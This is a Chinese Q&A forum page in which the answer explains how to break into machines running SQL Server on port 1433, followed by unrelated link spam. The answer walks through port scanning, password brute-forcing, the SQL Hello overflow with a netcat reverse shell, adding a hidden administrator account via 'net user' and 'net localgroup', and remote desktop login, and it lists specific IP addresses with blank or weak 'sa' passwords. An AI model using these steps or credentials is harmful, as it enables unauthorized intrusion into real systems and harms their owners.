问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

谁知道怎样入侵网吧的主机把1433端口开放?

发布网友 发布时间:2023-08-16 02:57

我来回答

1个回答

热心网友 时间:2024-10-27 09:47

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

久违的溢出工具

用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。

218.5.135.66 SQL-Server弱口令: "sa/1234"
218.14.115.111 SQL-Server弱口令: "sa/[空口令]"
218.12.38.52 SQL-Server弱口令: "sa/[空口令]"
218.12.97.14 SQL-Server弱口令: "sa/[空口令]"
218.6.242.228 SQL-Server弱口令: "sa/[空口令]"
222.100.119.3 SQL-Server弱口令: "sa/[空口令]"
222.105.67.200 SQL-Server弱口令: "sa/[空口令]"
222.105.28.130 SQL-Server弱口令: "sa/[空口令]"
222.106.60.51 SQL-Server弱口令: "sa/[空口令]"
222.117.107.1 SQL-Server弱口令: "sa/[空口令]"

在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具nc.exe和sql2.exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了饿。这里我们只用2000不说98。如果你把你的下的nc.exe和sql2.exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:>sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\system32>.就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

呵呵,基本就是这样了,,,,

参考资料:http://www.blog.e.cn/user1/17098/archives/2006/1473706.shtml

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
防静电手腕带简介 QQ管家的金币换礼品是骗人的吧,让输入验证码的时候礼品已经没了._百 ... 安全金币换礼包是真的嘛 电脑管家礼包是骗局? 管家里面用金币兑换实物,为什么我每次兑换都提示已兑换 电脑管家金币兑换礼包是正的吗? 中译英: 这件衬衫和你的裤子很配 我母亲今年79岁,九月份身体不适,B超和肝功检查,结果怀疑是有东西占位... 半永久眉毛二次补色后需要买修复剂吗 左边一个革,右边一个斥去掉点是什么字 梦见被一群龙追还有个领头的龙的预兆 梦到和领头人很亲密是什么意思 谁能告诉我这是什么成语 如何计算2002年第三季度的预测值 阴唇肿大什么原因 迈腾cd我不小心把格式调成了英文模式如何调回中文模式 英语作文,My family is birthday 以”my family is birthday"写一篇五年级作文,不少于10句, 请高手分析八字甲辰 甲戌 丁酉 辛丑的格局及运势 第一运程:1964年属龙的人2015年运程? 世间孤独命苦人谢汉昂求先生给算算运程,乾造甲辰年戊辰月丙戌日庚寅时... 四柱:甲辰 丙寅 丙午 辛卯 是否是克夫命?大运:38-48是凶绝运 请高人... 男命甲辰丙寅戊戌戊午,请问1.此命局会成火局了吗?如会成火局走壬申... 请问大师,甲辰年丙寅月丙午日丁酉时出生男孩55至65岁流年运势如何? ...更清晰?怎么才能让自己ps的图片打印成海报不失真尺寸怎么设置_百度... 求优化大师7.2.6.516注册码 红谷的包坏了到哪里维修 如何要求公司解除劳动关系 ...债券基金分红本金少了?债券基金分红是在本金里面扣吗? 宋词,辛弃疾李清照 在ping 127.0.0.1 1433时出现bad parameter 1433是为什么,该怎么处理... 如何让内网可以访问1433,而外网不能访问1433端口呢? 闪电2红包是什么意思 《魔禁之我有六大召唤器》txt全集下载 邢台有大学吗 怎样知道抖音有哪些好友? 笔记本充电器能用大安的吗 我是一个事业单位的干部身份的参照公务员管理人员,想调到其他事业参照单 ... 单位参公后进入的具有干部身份的人员还有机会转为参公吗 诸暨二手奢侈品牌的包包地址在哪里 ...只能打开word文件,而打不开Excel和powerpoint文件? 手机麻将怎么代理 如何组卷? 英语作文!当你看到一个国际商业公司的招聘信息,你想申请它。请在下面... 《热力营救》完整版在线播放 幻神称号是永久的吗 奔跑吧原始人幻神多少级开启 幻神小博士的称号是怎么样获得的 qq自由幻想幻神称号 在办公室最适合女孩子的工作??